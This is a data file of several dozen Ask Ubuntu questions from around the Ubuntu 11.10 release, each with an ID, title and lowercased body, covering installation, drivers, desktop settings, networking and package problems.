72284	problem selecting partition to install	i am trying to install ubuntu 11.10 alongside windows xp . when i am prompted where i want to install ubuntu , the three options to select from are : install ubuntu alongside microsoft windows xp home edition overwrite microsoft windows xp home edition with ubuntu something else when i selection option 1 , by default ubuntu installer selects the 1tb external hard drive that i have connected to the computer . there appears to be an option to select another hard drive , however , i can not use it to change to another drive . in other words , the drop down list does not work . what i want to be able to do is to install ubuntu on another ( internal ) 320gb hard drive that i have purchased for this very reason . my problem here is that i am not certain how to partition it for ubuntu using option 3 . i know that i will require a / partition and a /boot partition , however , i am not sure how much to allocate to each . furthermore , there appears to be more file systems to select from . which one do i use for each partition i create ? also , the intended target drive is currently formatted with ntfs . do i need to manually delete and re-create the partition to ext2 before i am able to install ubuntu ? fyi - my current configuration is as follows : /dev/sda /dev/sda1 fat16 32mb /dev/sda2 ntfs 160gb /dev/sdb /dev/sdb1 ntfs 320gb /dev/sdc /dev/sdc5 fat32 1000gb note that the /dev/sda1 is the partition reserved for eisa ( whatever that is ) , /dev/sda2 is the partition that contains the windows xp home edition , /dev/sdb1 is the new internal hard drive that i intend to install ubuntu , and /dev/sdc5 is the external drive which is used as a backup drive only . for some reason , windows xp uses this external drive to store temporary/configuration files for software that is installed on /dev/sd2 . any help/advice would be appreciated .
72285	openvpn with ipv6	i have a tun openvpn server running in routed mode which was set up on a ubuntu server and i know that ubuntu 's build of openvpn has support for the ipv6 for quite a while now but it did n't get much of my interest to fiddle around with it until my server provider recently provided me with ipv6 . so i 'd like to know how do you configure openvpn server to enable support for ipv6 ?
72288	select application by clicking in unity appliciation switcher	i 've just upgraded to 11.10 and have been forced into using unity ( which the more i use the more i like ) . however i frequently use the functionality of the static application switcher whereby i could click on the application i wanted to see . is it possible to activate the mouse for the unity application switcher ( i could n't see any appropriate options in ccsm ) ?
72290	dpkg : how to remove a package and all other packages depend on it ?	i tried to remove kde from my system . when i run ' dpkg -r kdebase-bin ' , it says 'kdebase-data ' depends on it . so how can i remove all the packages related to kde ?
72295	any news about a grooveshark scope for the music lens ?	it would be fantastic to have the ability to search for and select music from my grooveshark account right there within the dash . i was under the impression this scope would be created during the ubuntu app developer week ( sept. 5th-9th ) . it was listed in the agenda -- - > > http : //fridge.ubuntu.com/2011/09/01/ubuntu-11-10-development-update-9/ has anyone seen this loose in the wild yet ?
72300	gnome shell close , etc . buttons look	i switched to gnome shell and edited gconf settings desktop > gnome > shell > windows button_layout= : minimize , maximize , close the buttons are there , but they do n't use the gnome shell theme anymore , but rather look like the ones in unity ( small round buttons , with close being orange and the other two white ) . how do i make the buttons look like they should again ?
72302	is there a taskbar applet to show the status of a remote host ?	at the end of the day i would like to be able to copy files to my home pc just in case i feel inspired to work on them in the evening . but i only want to do this if the pc is on already . ( i can remote wake-on-lan the pc but i do n't want to always be doing that ) . i would like some taskbar applet that shows the status of the pc and whether i can ssh into it or not . obviously it would also be interesting to have an idea as to how long it is on for whilst i am at work as that gives a good indication of whether anyone is in or not . however being able to unobtrusively copy files to the remote machine is the main objective . perhaps another approach is to run rsync on cron and if the remote host is not up then i guess it will fail . is that correct ? if anyone else has ideas on how to best sync a work and home pc then please do tell .
72303	can not detect ati radeon hd6720g2	i wish to install ubuntu 11.10 on my new laptop but because the system can not detect the graphic , then the screen are blank . how and what should i do ? i really want to use ubuntu 11.10 .
72305	how do i get ârestartâ option in the system menu in gnome classic ?	i previously asked a similar question about unity , but now i 'm using ( and sticking with ) gnome classic . there is this drop down menu in the top right corner of the gnome panel : when you press `` shut down '' , you get a dialog window that comes up with the following options : however , because i probably restart as much or more than shut down , and i never suspend or hibernate , i 'd like to move the `` restart '' from the dialog window to the drop down . is it possible to place a `` restart '' option right into the dropdown menu ?
72308	can i disable the alt+window+right click behaviour for editing panels in gnome classic ?	in gnome classic 11.10 , when you want to make edits to the gnome panel , you have to press alt + super and then right click . i believe in some cases it 's just alt and right click , but because of setting change to get compiz to run on my machine , it became alt + super and right click . i believe this is a known issue . in any case , whether it 's alt + super and right click , or just alt and right click , this new key combination thing is totally unneeded as far as i 'm concerned . i was perfectly fine with just right clicking to edit the panel , as was the case in gnome 2.2 . is there a way to change this behaviour so i can edit the panel just by right clicking and not having any key combination ?
72313	some keyboard keys not working since upgrade to 11.10	ii.04 was working perfectly on my acer aspire 3050 laptop , until i upgraded a couple of days ago . yesterday , i was unable to type in my password as only about half the keys on kb are working . i logged in on a guest account , but could n't do anything or access internet because i needed to type in my pw to do so . decided to do a fresh install of 11.04. however i ca n't enter bios using the designated key ( f2 ) to make it boot from cd . guessing that it 's one of the non-functioning keys . : ( can anybody help out here ? thank you in advance .
72314	nvidia driver failed install	if i try to install the driver for my nvidia 320m card it shows me sorry , this driver installation failed . for more information , please refer to the log file : / var / log / jockey.log and the last record in /var/log/jockey.log is 2011-10-26 12:36:29,561 error : xorgdriverhandler.enable ( ) : package or module no $ 2011-10-26 12:36:50,173 debug : nvidia ( nvidia_current ) .enabled ( ) : target_alt /us $ 2011-10-26 12:36:50,173 debug : kmh enabled : false 2011-10-26 12:36:50,214 debug : nvidia ( nvidia_current ) .enabled ( ) : target_alt /us $ 2011-10-26 12:36:50,214 debug : kmh enabled : false
72315	how to make unity remind me of windows asking for attention ?	i am rather new to unity , i have only started using it after upgrading to 11.10 several days ago , and one thing really worries me . i started to miss incoming messages in empathy and skype because sometimes i 'm not there when they arrive . and when i 'm back , i do n't use the launcher because i have a maximized window , so i do n't see that there are windows requesting my attention . is there a way to make the launcher remind me of such windows ? or maybe make it stick them out halfway like it does when an event happens and keep them like that until i click on them ?
72319	files disappeared in ntfs partition using ubuntu 11.10	i am working with both windows 7 and ubuntu in my laptop . while using ubuntu i usually save a lot of files in my windows partition ( ntfs ) , which i use as some sort of common storage place between both oss . the thing is , yesterday some of my files i created on the ntfs partition simply disappeared . then i came across this post files disappear on ntfs partition and ran chkdisk , then the files reappeared perfectly . the problem is that now i do n't feel comfortable using ubuntu because i 'm afraid files may disappear . is there a way to permanently fix this problem ? i thought ntfs issues had already been overcome in the linux kernel .
72322	how to i prevent the screen from locking when i want a virtual machine to ungrab my mouse ?	this happens in both kvm with virt-manager as well as virtualbox . the key combo to ungrab the mouse from kvm is control-option-l on my apple macbook pro keyboard . option on mac keyboards is mapped to the pc-keyboard alt key . control-alt-l also locks the screen under ubuntu unity . i can not find a way to edit the key accellerator in either software package . i do n't think this is just the lock screen keyboard accellerator though , because virtualbox does have a way to configure the ungrab keys . because my keyboard does n't have a righthand control key . i use f1 to ungrab under vb . this also result in locking the screen .
72328	fatal error after installing steam via play on linux	i 've recently installed steam via playonlinux , but every time i want to run it , it gives me a screen with : '' fatal error : could not load module 'bin/filesystem_steam.dll ' `` there is nothing about this error on the internet . could anyone please help ?
72329	change preferred applications in gnome 3 fallback	i ca n't find out how to change my preferred application since i 'm using gnome 3 fallback ( two panel style ) in oneiric .
72332	multitouch mess-up -- should i do a partial upgrade ?	i was trying to get multitouch working on my 11.10 installation . some googling led me to believe that i should install : xserver-xorg-input-multitouch to do that . this seems to be incorrect and may have messed up my system . ever since i installed this , not only does my install still not have multi-touch , but my touch pad occasionally does not work , i have some booting freezes , and am asked to partial upgrade . ( apparently fiddling with xserver is some kind of partial upgrade , i take it ? ) anyway , before partial upgrading , i saw that this package would be uninstalled , but no new xserver-xorg-input would be installed to replace it . ( however , 172 other packages will be added , including cups , empathy , and gedit , which all seem to currently work fine . ) given that it may be removing something important in xserver-xorg , and that it may be installing new ( ? ) versions of things that already were upgraded for 11.10 and working fine ( and as far as i know , /not/ removed ) , is it safe to do this partial upgrade or not ? ( sidenote , i 've consulted upgrade manager wants me to do a partial upgrade and partial upgrade and i think my case is a little different , because these cases seemed to genuinely start an upgrade and finish part-way through it , whereas i just installed an inappropriate version of something , and want to get back to the right one . ) thanks !
72334	picasa would not log into my account	i have installed wine on 11.10 , but for some reason picasa does not detect the internet connection , which exist system wide , except for picasa any suggestions ? hi , i have reinstalled picasa 3.0 for linux after having replaced ubuntu 11.04 by 11.10 . but this time i can log in web album/google account using any browser but can not log in my picasa web album through picasa . every time i try , it says authentication failure . i dont understand where the problem is . could any one help ?
72344	how can i resize ntfs partition in gparted ?	my family pc has windows vista and lately it has became unusable , having strange errors and taking hours to do anything at all , so i 'm installing ubuntu 11.10 alongside it . i went into gparted to resize the vista partition but found that it had an exclamation point in a red circle next to it : i tried to resize it but the resize/move button was grayed out . i thought that this might have to do with the exclamation point so i looked at the information and found a load of errors : what does the exclamation point mean ? how can i resize my partition ? update 1 i booted into safe mode with command prompt in vista as suggested by eug and ranchkdsk c : /f /r ( /f fixed errors on the disk , /r locates bad sectors and recovers readable information ) and got : chkdsk can not run because the volume is in use by another process . would you like to schedule this volume to be checked the next time the system restarts ? ( y/ ) when i reboot it does n't run chkdsk , i 'm selecting safe mode with command prompt again because i ca n't boot normally . how can i stop it being used ? update 2 i tried doing what luis suggested . here is the terminal output : ubuntu @ ubuntu : ~ $ sudo ntfsfix /dev/sda3 mounting volume ... ok processing of $ mft and $ mftmirr completed successfully . ntfs volume version is 3.1 . ntfs partition /dev/sda3 was processed successfully . ubuntu @ ubuntu : ~ $ sudo apt-get install ntfsprogs reading package lists ... done building dependency tree reading state information ... done note , selecting 'ntfs-3g ' instead of 'ntfsprogs' ntfs-3g is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i still can not resize the partition . ntfsfix does n't look like it did anything and ntfsprogs is already installed . i can access the hard drive and do backups with the ubuntu live cd which i 'm using now . any other suggestions ? update 3 i attempted to use the ntfsresize command but i got an error : error : volume is scheduled for check . run chkdsk /f and please try again , or see option -f. this is because i ran chkdsk in vista safe mode with command prompt and it could n't do it because it was in use but offered to do it at the next reboot . i reboot and i get to the menu to the menu to choose whether to start windows normally , safe mode , etc instead of checking the disk . is there any way i can unschedule ? edit i just found out that i could use the -f option to force it . it failed and told me to run chkdsk /f in windows and then reboot twice . but the chkdsk program is in the partition i am trying to check so it says it is in use .
72347	always visible keyboard without other windows above or under it	i have a small touch-netbook with ubuntu 11.10 . i want to do either one of this ( both solutions would be fine ) configure onboard ( or any other touch-keyboard ) to always be at the bottom and no other window can go above or under it . this includes maximizing ! create a panel/application window of my own with this behaviour basically i want the same functionality as a panel and configure onboard/unity/compiz to obey this configuration or create my own panel . any hints would be really appreciated !
72349	how to run an ssh server without a static ip address	i have a powerful computer in the lab and i installed ubuntu 11.10 64-bit on it . i want to install an ssh server on it , so i can reach it from home and even from my android via ssh . but i have n't got any experience on creating an ssh server . the machine has a dynamic ip . i do n't want any other ssh users , installing it only for myself will be enough for me . where should i start ? what tools do i need and how would i configure them ?
72350	why does n't ctrl+alt+del work in kde when set as a shortcut for log out ?	in kde , i have ctrl+alt+del specified as shortcut for log out in kde session manager , but once i press it - nothing happens . the same happens with log out without confirmation and other shortcuts . how to fix it ? p.s . restarting kde session ( or even rebooting pc ) does not help .
72354	bottom taskbar gone on 11.10	i am fairly new to ubuntu and have used it for the last couple of years on a pc just for surfing the net ( and thats about it ) . upgraded to the latest version and the bar at the bottom of the screen has gone my main problem is navigating between different windows - i cant anymore because i dont know what is open . ps is there anyway i can move the launcher thing to the right of the screen because every time i go to click on the back button on my web browser the launcher pops up and launches desk home ? cheers in advance ?
72360	no headphones sound in asus u52f laptop	i have no sound in kubuntu even in 11.04 and now in 11.10 the same problem . my laptop is asus u52f . i have tried all , no idea what to do now . lspci |grep -i audio returns : 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 )
72361	use gnome 3 with only the keyboard	unity runs too slow in my machine , and gnome-shell works very well . i do n't like very much gnome-shell but i 'm doing my best effort . but one thing that i ca n't find is how to select a different windows or pick something from the left dock with the keyboard . i mean , you hit the win key , and the activity panels shows . then , the most obvious is that with the keyboard i can pick some window , with tab change from windows to applications , etc . but no , seems that i can press a key to show the activities screen , but then i have the pick the mouse and click in the place that i want to go . recently i went to presentation about accessibility in a google developer day , and the presenter says that if we forget everything that she says , we have just to remember `` you have to unplug your mouse and be able to use your application '' . gnome 3 says hundred of times that is the `` most accessible desktop '' , but how they can miss use the system with just the keyboard ?
72364	touchpad does n't work after logging in	the touchpad of my laptop fails to work soon after i login to ubuntu . i 've gone through several threads in forums regarding the same matter and have tried out : gconftool -set boolean ... command i 've even tried to reboot the system in recovery mode . i 've unchecked the system - > preferences - > enable touchpad while key type and restarted as well . none of the above methods which did work for few seem to work for me . please help me . how can i fix the touchpad issue in ubuntu 11.10 without a reinstall ? i am using 64 bit oneiric , on an dell inspiron
72366	how can i restore the unity launcher ?	after adding some default security packages and changing my cursor theme , the whole unity launcher gets walloped and is gone when logging in , which seems a bit wonky for unity . tried to run unity -- reset in a separate terminal but with the default x running , not certain if i need to drop to recovery first to try this procedure . actually seems that having the whole unity package with size 48 icons by default is a mess , would be much better to be able to modify to suit and tweak the interface to my needs . surprised this release is this fragile , has never been my experience to date with ubuntu since the early days of 6.x releases . trying to love unity , but this one is a bit fragile if it can not be easily recovered and restored on modern hardware . glad to supply any necessary documents , logs and/or information to determine cause/solutions . amd phenom quad core 960 ht 3ghz 64-bit 11.10 install on 9th iteration trying to determine which package is the killer . the amd radeon graphics detection in jockey is particularly confusing at the moment as well , as the post-release update package continues to detect as necessary , but have found this will always fail and will leave remainders in place . avoiding the second install of that demand like the plague now , but will confuse users , and not certain if order of that install matters or causes issues .
72367	some apps shown twice in dock when using gnome shell ?	i just started using gnome shell and so far i love it . however , i added some of my frequently used apps as favourites to the dock , and some of them show up twice when launched . once as if they are not running and then another that is running , but with a low-rez icon . so far this has happened with : komodo ide smartgit smartsvn it 's quite annoying . i assume this happens because these apps run 2 processes , the first of which ( that is used in the .desktop shortcuts ) is just a bash script that sets environmental variables and applies some logic prior to launching the actual program . does anyone know if there 's any way to fix this ? it 's not a show stopper but it 's still quite annoying . thanks
72368	keyboard layouts missing in lock screen , 11.10	i 'm a frequent user of the usa dvorak keyboard layout , but have the default qwerty keyboard . stuff works simply by adding the layout in the keyboard settings in ubuntu , and worked well in 11.04 . however , upon upgrading to 11.10 , while i 'm able to use dvorak in normal session i 'm stuck with qwerty in lock screen . my dvorak layout does n't exist in lock screens . i even added a custom shortcut to initiate it , but no luck . any ideas and workarounds ?
72377	how to create a vpn only accessible website ?	i 'm trying to setup an intranet on a dedicated server , it would need simple things like a sharing folders and a private website that will only be accessible trough vpn . now i 'm really not sure how to achieve this , i kinda get the idea of setting up vpn that 's fair enough but how do i set the website to only show in the intranet ? if anyone could point me to a guide or something it would be great : ) thanks
72382	how to upgrade from 10.04 without affecting touchpad settings ?	i am using a macbook pro 8,1 ( early 2011 ) model . i tried installing ubuntu 11.10 , and had issues with the touchpad . i installed 10.04 ltr over the 11.10 install ( i completely wiped the hard drive and then installed 10.04 ) and the touchpad has worked fine , however my graphics card ( intel hd graphics 3000 ) is not working . it is only displaying a resolution of 1024x768 and i know my laptop can go higher than that . i read some forum posts online which said that i have the new sandy bridge processor and only 11.04 or newer would support it . is there any way to upgrade from 10.04 to 11.04 and further without affecting my touchpad settings at all ? any help is appreciated-thanks .
72384	does anyone know why does ubuntu 11.10 use texlive 2009 ?	many of my old examples for pgf plots do not work any more . i think the problem is due to this . does anyone know why 11.10 use the old version of texlive ?
72386	print screen key can no longer select a region to capture	after upgrading from 11.04 to 11.10 , i 've noticed that the `` take screenshot '' application used to be launched when i 'd hit print screen . now it automatically captures the entire screen . in 11.04 it would pop up the `` take screenshot '' application which allows me to capture a rectangular region of the screen . can this be reverted ? i never want to capture the whole screen , only portions of it , which means manually cropping out that section in gimp with this changed behaviour . cheers .
72387	upgrade php version to 5.3 on ubuntu	how can i do a version upgrade from 5.2 to 5.3 ? php update/upgrade is saying i 'm using the latest version . i 'm using ubuntu server 9.04
72397	how can i see the contents of an inserted cd ?	when opening the cd it does n't show all files like music and videos etc except power point files . i installed 11.10 ubuntu using oracle virtual monitor host os is windows 7 .
72403	english dictionary in libreoffice	currently , spell check does n't work when 'english ( uk ) ' is selected in tools > language . it only works with the us variant . strangely , despite giving the uk variant option in tools > language , under tools > option > language , there is no blue tick indicating the dictionary is installed . i 've tried finding an english uk/gb dictionary extension with no luck . can anyone suggest how to find and install a english ( gb ) dictionary and work with spellchecker ?
72410	why do my windows resize and all move to the first workspace ?	i recently upgraded to ubuntu 11.04 , and have it set up with 4 workspaces . most of the time i can switch between the workspaces without a problem using ctrl+alt+left/right/up/down , but at least once a day , i manage to hit some other combination that causes all of the windows to move to workspace 1 and resize all of the terminal windows . this is extremely frustrating because i have to stop what i was doing and move everything back where i had it and resize the windows again . what combination of things is causing this to happen and how can i disable it ? edit : i just had this happen after unlocking my screen as well , so it may not be directly related to switching my workspaces ... edit ( jan 11 , 2012 ) : updates are current as of earlier this week . .xsession-errors.old has a good amount of information in it , but i do n't know what is significant and what is just noise , and it does n't contain any timestamps , so i have no idea when what happened . the last block of lines from .xsession-errors.old : ( indicator-multiload:1791 ) : libappindicator-warning ** : unable to send signal for newicon : the connection is closed g_dbus_connection_real_closed : remote peer vanished with error : underlying giostream returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting . nm-applet : fatal io error 104 ( connection reset by peer ) on x server :0. unity-window-decorator : fatal io error 11 ( resource temporarily unavailable ) on x server :0.0 . graphics card is an ati firepro v3700 ( firegl )
72416	change default application to open file in oneiric	in oneiric , the `` open with other application ... '' menu in nautilus only allows to select one of the predefined applications . there is no option for a custom application any more . can you suggest how to open a file with a custom command ? for example , i want to change the default text editor from gedit to komodo edit which , even if installed , does not appear in the list of available applications ( it 's installed locally ) . previously , i could just say `` open with custom command '' , digit komodo and it worked . how can i do this in oneiric ?
72418	getting the right ati drivers for 6370m	just bought a lenovo g570 with a radeon 6370m video card . tried both drivers recommended under `` additional drivers '' . the first driver failed . sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log the second driver installed , but when i restarted and went to log in again , my only options were ubuntu and ubuntu 2d . no unity . there were no panels or anything , just a menu that looks like this : file edit view go bookmarks help so ... i opened firefox and went to ati 's page to get their latest supported driver for my card . i uninstalled the old driver , restarted and ran the installation script . sudo chmod +x ati-some-really-long-driver-name.run ./ati-some-really-long-driver-name.run it said it was successful , but when i restarted - still , no unity , no application dock on the left hand side of the screen , no panels . just the menu i described above . what gives ?
72420	banshee never connects to a radio stream on the first try	i have 17 different radio streams . i 'd like to be able to use the alarm extension so i could wake up to one of them playing . however , i ca n't do this because banshee ( 2.2 daily build ) never , and i do mean never , connects to any of them on the first try . if i click to play any radio stream , on the first try it says `` contacting ... '' , and then it says `` idle '' , and a little x mark appears beside the name of the station . however , if i click it a second time , it works fine . it always goes like this . without fail . i can never connect on the first try , and i can almost always connect on the second try . i do n't know how close together the two tries have to be in order to work . what i do know , though , is if i use the alarm extension to start playing a radio stream in the morning , nothing happens in the morning because it attempts to connect and then fails and gives up trying . any advice on how to solve this would be appreciated . see also : a thread for this question on the banshee mailing list a bug report with debug output from banshee
72434	how can i observe what the kernel 's doing when it tries to boot up a wireless card ?	i have a netbook with a wireless card that does n't work out of the box in ubuntu , and i was wondering if i could use any profiling tools to observe what the kernel is doing when it tries to enable the card . i 'm interested in figuring out what the problem is so i can have a stab at fixing it in the code rather than using a workaround such as ndiswrapper , and i 'm currently trying to figure out where to begin . i 'm hoping to see something along the lines of this : startingsoundcard ( ) - success startingwirelesscard ( ) - failed //a whole bunch of diagnostic data here startingsomethingelse ( ) i know it wo n't be as easy or as simple as that , but you get the idea . bonus points if your suggestion is general purpose and can be used to generally observe the behaviour/output of the kernel .
72437	what to use to connect to nomachine 's server ?	i was told to use nomachine to access a remote server . is there anything else that i could use instead ? the remote server is already running the nomachine 's server application . i would like to use an application supported by ubuntu ( for nomachine 's package i had to enable a ppa , using the directions here ) .
72438	i can not control banshee from the sound menu in gnome 3 shell	i am running gnome 3.2 on ubuntu 11.10 . in banshee , i have 'show banshee in sound menu ' enabled in edit-preferences . mpris d-bus integration and sound menu integration extensions are also enabled . still , there is no banshee on the sound menu . what is missing ? thanks in advance .
72446	how to remove all files and subdirectories in a directory without deleting the directory in bash ?	is there a command to remove all files and subdirectories in a directory without deleting the directory ? for example if i have directory `` dontdeleteme '' with subdirectories `` 1 '' , `` 2 '' , `` 3 '' and each subdirectory has a few pictures in it , how can i remove the subdirectories `` 1 '' , `` 2 '' , and `` 3 '' and all the files in the them , without removing the parent directory `` dontdeleteme '' ?
72449	how can i choose a different ubuntu one default local folder ?	i would like to tell ubuntu one to sync with '~/public/ubuntu one ' rather than '~/ubuntu one ' . since i 'm using it on arch linux , i do n't have any right-click option for that . i tried to edit ~/.config/ubuntuone/syncdaemon.conf and add the line root_dir = ~/new/folder ( as suggested in this thread ) , but the file is automatically reverted to its previous state . also , the command u1sdtool hangs and does apparently nothing - i have to use ctrl + c to close it . is there another way to setup the default ubuntu one default local folder ?
72451	why do some open applications appear as `` question marks '' in the unity launcher ?	i 'm having a problem with a couple of programs that have launchers in unity but then create a separate icon after launched . is is possible for the launcher to track the windows it spawns to organize better ? or is this a bug in unity itself ? it might not matter but this specific program is a mono program , and the icon spawned is listed as the panel .
72452	how to turn off compiz 's `` drag to maximize '' behaviour ?	just starting to use unity with 11.10 , and obviously there are a lot of changes to get used to . one of the most annoying is the habit it has of trying to maximize a window when i drag it up against the top bar to position it . how do i disable this behaviour ? i assume there 's a toggle in ccsm somewhere , but i ca n't find it .
72456	why do i get a software not in sources error when installing software ?	i am using ubuntu 11.10 . i have tried with all options like sudo apt-get update and sudo apt-get upgrade i am getting problem for many software while installing in software center , shows error 'not found there isnt software called ' -- -- -- ' in your sources . also this is problem while installing gnome-shell . sanket @ sanket-dell-system-xps-l502x : ~ $ sudo apt-get install gnome-shell reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell : depends : gjs ( > = 1.29.18 ) but it is not installable depends : libgjs0c ( > = 1.29.18 ) but it is not installable depends : caribou but it is not installable depends : cups-pk-helper but it is not installable depends : mesa-utils but it is not installable recommends : gnome-themes-standard but it is not going to be installed recommends : gnome-session-fallback but it is not going to be installed e : unable to correct problems , you have held broken packages . is there any problem with repository , what should be done ? ? ? ?
72458	install an old version of ubuntu , say , 11.04 over my current 11.10 ?	is it possible to install another version of ubuntu in my newest version 11.10 ? something does n't work well in this new version ; see my post . i may need to switch back . thanks a lot !
72461	disable importing of documents and settings during install ?	i like to dual-boot most of my machines with windows 7 and the latest version of ubuntu . i main ubuntu of course , but i keep a standard windows install for games , and for visual studio for work and development . the trouble is , every time i install ubuntu fresh ( which i like to do for every new version , as i enjoy setting things up new each time ) the installer copies all of my documents and folders over from my windows partition , which is often a lot of files , that i of course immediately delete once i 'm logged into ubuntu the first time . it also ( amusingly , in an ironic way ) copies the desktop wallpaper , which is the giant blue windows logo . this is really more of an inconvenience than anything , but is there any way to disable this behavior ? i did n't see anything about it as an option while setting up the installer , and it really seems like there should be an option about that somewhere . also , i 'm curious as to what `` settings '' get imported . what all do i need to run around and undo ?
72462	failed to download repository information ( pidgin-developers ppa )	got this error when i tried to check for updates from my update manager , its showing me about some updates but gives me this error w : failed to fetch http : //ppa.launchpad.net/pidgin-developers/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/pidgin-developers/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
72464	ssh controlmaster tunneling - works ( 11 ) broken ( 10 lts )	my primary workstation runs the latest 11 workstation and my coworkers primary workstation runs the latest 10 lts workstation . he said that ssh tunneling is not working with controlmaster ( cm ) and asked me to test , which i did and it worked fine . we then did a complete fresh install of 10.04 lts on another box and sure enough ssh tunneling does not work with cm . example : david @ ubuntu : ~/.ssh $ more config host * controlmaster auto controlpath ~/.ssh/master- % r @ % h : % p ssh -l dingbat sshserver.host.com - enter my password ssh -l dingbat sshserver.host.com -l 2222 : another.host.com:22 - do n't need to enter my password because of the control channel , which works fine ... it just doesnt setup the tunnel on 10 lts while it does on 11. netstat -anp | grep 2222 - on 10 lts there is no listening port while on 11 there is ... and i could n't find anything in the logs .
72471	correct way of mounting a windows share	i mounted a windows share to my ubuntu 11.10 system via adding the following line to the /etc/fstab : //serveraddr/sharedfolder /mnt/foldername/ smbfs credentials=/home/myname/.smbpasswd 0 0 using the tutorial here . but there 's a problem with the permissions . the owner of the mount folder is root . i can not create any folders or files in the mounted point is i do n't become the root . even i can not change the ownership to my default user via sudo chown -r myname . i googled and saw that it might stem from the fact that windows file formats ( fat32/ntfs ) can not save ownership . but when i connect to the same location via samba as smb : //serveraddr/sharedfolder by providing my credentials , i have the privileges to write without being the root . how can i make it to let me write to the mounted folder ?
72479	why is firefox on ubuntu choppier than firefox on windows ?	i have nvidia driver on both oss . same ff version . both with smooth scrolling enabled . using ff in windows is a big joy ! it 's so smooth , like a hot knife slicing butter . ubuntu 's ff is somewhat choppier . i realize this may be the driver as sometimes i see tearing in ubuntu . i use v 11.10 . am i the only one with such a problem ?
72486	can i pass a dpi flag to lightdm to set the proper dpi for x ?	what is the proper way to set dpi value now ? gnome-tweak allows to set only scaling factor , which is unsatisfactory and also not all applications take that into account ( chrome for example ) . i would like to pass `` -dpi '' flag to xorg when it starts , but ca n't find a way to configure `` lightdm '' to do so . is it possible ?
72492	sound muted when headphones are connected in hp dv4	i 'm using a hp dv4 running ubuntu 11.10 . the sound is fine when the speaker is on and the volume control works fine too . but when i plug in the headphones , the sound gets muted . even if i change the volume to max , the indicator led show 's that its muted . is this a bug ?
72497	shape incoming traffic using tc ( and ifb ? ) on a nat ed interface	i have an ubuntu machine acting as a router/stateful firewall/nat for my internet connection . it has a couple of ethernet ports and a wireless network for my home network ( eth5 , eth7 , eth10 and wlan1 ) . it is connected with a dsl modem in bridged mode giving it a connection to the internet called ppp0 . i currently use tc and a simple rate limit ( tbf , iirc ) to shape the outgoing traffic ( which works great -- no matter how much is uploading , my connection does not increase latency because of it , which is the goal ) . what i would like to do is use tc to limit and prioritize my incoming traffic . i know you ca n't do this without setting a a fake device , using imq or ifb . ( i believe ifb is the new , `` right '' way to do it . ) so , how do i set up ifb so i can i set up ifb so i can set up a simple tbf limit for now ( and later set up bandwidth allocations , like tcp ack packets get a certain guaranteed amount of bandwidth ) ?
72500	how do i make ubuntu look `` classic ? ''	how do i make an ubuntu 11.10 setup running xfce , or maybe gnome 3 classic mode look and behave exactly like the classic ubuntu setup of ubuntu 10.10 ?
72508	mic noise when i speak	my sound card is `` alc888 '' , when i use microphone on teamspeak 3 , or sound recorder , anything , all i can hear and my friends , is noise , they do n't hear my voice . i 'm using ubuntu 11.10 . anyone can help me ? sorry , for bad english .
72513	how to have thunderbird notify of new messages without having it in the launcher	is there any way to make thunderbird notify me of new messages without having it in the unity launcher . just like some small notification in the upper bar or like the notification boxes that appear in the upper right corner and disappear after a couple of seconds .
72517	where can i set the default terminal emulator ?	gnome terminal shows up in several places : launchers which start terminal commands the launch terminal keyboard shortcut the menu items added by nautilus-open-terminal does each of these explicitly specify gnome terminal , or is there some centralized setting they reference ? i have checked for : a setting in system settings â¸ system info â¸ default applications an analog of select-editor or sensible-editor an environment variable containing gnome-terminal . this one actually looks hopeful : $ env | grep gnome-terminal colorterm=gnome-terminal but i 'm not sure where to go with it . if such a setting exists , my goal is to change it to use a different terminal emulator by default .
72520	how do i mount usb drives as given user automatically ?	how do i get my usb drive to auto-mount as owned by 'me ' rather than by whomever is logged in to the computer screen at the time ? often i ssh into my computer while someone else is using it , and so the read-write permissions of devices i mount go to them . this causes all kinds of permission related problems and there must be a way for usb drives to always mount to a given user .
72521	respawning vpnc from networkmanager	my university has a special wireless network that requires you to use a vpn to get into the internet . so i have little script that connects me to the vpn once i get into the wireless : /etc/networkmanager/dispatcher.d/99bonnet : if [ [ `` $ 1 '' ! = `` wlan0 '' ] ] then return fi # kill vpnc if it is still active if pgrep vpnc then vpnc-disconnect fi # exit if we are not connected to bonnet if ! iwconfig wlan0 | grep bonnet then return 0 fi # handle the action if [ [ `` $ 2 '' == up ] ] then vpnc `` $ vpn_config_file '' else vpnc-disconnect fi this works like a charm and connects and disconnects the vpn with the wifi . the problem is that vpnc has a tendency to die on me . is there some way to respawn the vpnc if it dies ? there is a nice wiki about process management , but it seems that i can not really use inittab for my purpose here , or at least not straight forward . what would be a non hack way to respawn vpnc if it dies while i am connected to the certain wireless ?
72525	how do i get monodevelop 2.8 with mono 2.10 ?	after some research i found out , that the repo provides the old version 2.6 of the monodevelop ide , but as there is already the latest version published i want to know whether someone knows how i can install it ( there is no package out for ubuntu 11.10 ) without messing up my current system .
72527	dash search function does n't work	it was working about an hour ago , now it does n't give any results ( even for `` firefox '' for example ) . what 's wrong ?
72532	ubuntu 11.10 dell m4600 ati radeon hd6700m dual monitors	i am having problems with my m4600 supporting dual monitors . i have a ati radeon hd 6700m ( from lspci ) and have installed the ati proprietary drivers for that model and followed the instructions found here . the resolution is fine , however , when i first boot , the resolution is mirrored across both of my 1280x1024 monitors ( computer is docked ) . when i attempt to change it to span my desktop using ( as root ) amdcccle , it logs me off and i have to log in again . i log in and the mirrored setup is the default again . if i try to uncheck the mirrored monitors using the ubuntu display manager ( default display application ) , it will log me off as well . i had this working before the .xsession-errors file filled up my hdd and i was forced to shutdown . i reinstalled the ati drivers like i said above , but can not get this to work . i love ubuntu , just not on dells : ) . anyone have any solutions or advice on some next steps ?
